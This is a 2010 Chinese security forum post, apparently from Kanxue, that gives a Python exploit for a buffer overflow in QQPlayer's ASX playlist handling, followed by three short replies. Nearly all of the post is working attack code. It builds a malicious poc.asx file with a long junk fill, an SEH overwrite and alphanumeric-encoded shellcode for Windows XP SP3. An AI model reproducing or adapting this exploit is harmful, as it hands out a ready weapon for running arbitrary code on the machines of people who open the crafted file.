首页
社区
课程
招聘
[推荐]QQPlayer asx文件处理缓冲区溢出漏洞
发表于: 2010-7-21 22:46 4074

[推荐]QQPlayer asx文件处理缓冲区溢出漏洞

2010-7-21 22:46
4074
#################################################################  

#  

# Title: QQPlayer asx File Processing Buffer Overflow Exploit  

# Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University  

# Vendor: www.qq.com  

# Platform: Windows XPSP3 Chinese Simplified  

# Test: QQPlayer 2.3.696.400  

# Vulnerable: QQPlayer<=2.3.696.400p1  

#  

#################################################################  

# Code :  

   

head ='''<ASX version="3.0">  

<Entry>  

<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''

junk = "A" * 1975

nseh ="\x42\x61\x21\x61"

seh  ="\xa9\x9e\x41\x00"

adjust="\x30\x83\xc0\x0c"

shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"

           "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"

           "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"

           "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"

           "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"

           "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")  

junk_="R"*8000

foot ='''_playlis.wma"/>  

</Entry>  

</ASX>'''

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot  

   

fobj = open("poc.asx","w")  

fobj.write(payload)  

fobj.close()

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
作者:信息安全工程研究中心李青山,软件与微电子学院,北京大学
2010-7-21 23:19
0
雪    币: 213
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
牛逼
2010-7-22 10:19
0
雪    币: 91
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
语不惊人死不休...
2010-7-23 10:07
0
游客
登录 | 注册 方可回帖
返回
//